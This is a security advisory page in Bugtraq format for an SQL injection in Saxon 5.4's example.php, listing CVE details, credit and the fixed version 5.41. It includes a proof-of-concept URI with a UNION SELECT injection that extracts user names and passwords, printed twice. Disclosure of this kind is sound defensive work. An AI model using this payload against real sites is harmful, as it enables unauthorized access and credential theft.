Saxon Example.PHP SQL Injection Vulnerability
BID:26238
Info
Saxon Example.PHP SQL Injection Vulnerability
| Bugtraq ID: | 26238 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-4863 |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 29 2007 12:00AM |
| Updated: | May 07 2015 05:34PM |
| Credit: | netVigilance is credited with the discovery of this vulnerability. |
| Vulnerable: |
Quirm Saxon 5.4 |
| Not Vulnerable: |
Quirm Saxon 5.41 |
Discussion
Saxon Example.PHP SQL Injection Vulnerability
Saxon is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue affects Saxon 5.4; earlier versions may also be affected.
Saxon is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue affects Saxon 5.4; earlier versions may also be affected.
Exploit / POC
Saxon Example.PHP SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com/example.php?template=' UNION SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(USER_NAME, USER_PWD), NULL FROM SX_saxon_users %23
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://www.example.com/example.php?template=' UNION SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(USER_NAME, USER_PWD), NULL FROM SX_saxon_users %23
Solution / Fix
Saxon Example.PHP SQL Injection Vulnerability
Solution:
The vendor has released Saxon 5.41 to address this issue.
Quirm Saxon 5.4
Solution:
The vendor has released Saxon 5.41 to address this issue.
Quirm Saxon 5.4
-
Quirm saxon5-41.zip
http://www.quirm.net/downloads/saxon/saxon5-41.zip
References
Saxon Example.PHP SQL Injection Vulnerability
References:
References: